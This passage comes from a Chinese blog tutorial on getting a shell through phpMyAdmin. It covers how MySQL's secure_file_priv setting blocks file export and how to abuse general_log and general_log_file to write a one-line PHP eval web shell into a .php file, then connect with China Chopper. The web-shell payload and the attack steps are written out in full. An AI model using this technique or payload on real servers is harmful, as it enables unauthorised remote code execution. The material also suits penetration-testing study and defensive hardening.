但在新版的mysql中,这句话并没有运行成功。
Mysql新特性secure_file_priv
会对读写文件产生影响,该参数用来限制导入导出。我们可以借助show global variables like '%secure%';
命令来查看该参数:
当secure_file_priv
为NULL时,表示限制Mysql不允许导入导出,所以爆出错误。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini
文件,在[mysqld]内加入secure_file_priv =""
即可:
当secure_file_priv
的值没有具体值时,表示不对mysqld 的导入|导出做限制,此时就可以执行导出命令。
利用Mysql日志文件
Mysql 5.0版本以上会创建日志文件,通过修改日志的全局变量,也可以getshell。但是也要对生成的日志有可读可写的权限。(注:linux因为权限问题亲测没有成功)。先来介绍两个MySQL全局变量:general_log
和 general_log file
。
- general log 指的是日志保存状态,ON代表开启 OFF代表关闭;
- general log file 指的是日志的保存路径。
查看日志状态的命令:show variables like '%general%';
在以上配置中,当开启general时,所执行的sql语句都会出现在WIN-30DFNC8L78A.log
文件。
那么,如果修改general_log_file
的值,那么所执行的sql语句就会对应生成,进而getshell。
对应就会生成xxx.php文件
将一句话木马写入xxx.php文件:SELECT '<?php eval($_POST["cmd"]);?>'
接着可以看到日志文件中记录了木马语句:
最后中国菜刀连接,getshell:
以上就是PhpMyAdmin后台getshell(渗透测试)的详细内容,更多文章请关注木庄网络博客!
相关阅读 >>
在ubuntu 17.04上通过phpMyAdmin管理远程mysql数据库17.10
解决phpMyAdmin不能登录mysql以及空密码被禁止的问题
更多相关阅读请进入《phpMyAdmin》频道 >>
数据库系统概念 第6版
本书主要讲述了数据模型、基于对象的数据库和XML、数据存储和查询、事务管理、体系结构等方面的内容。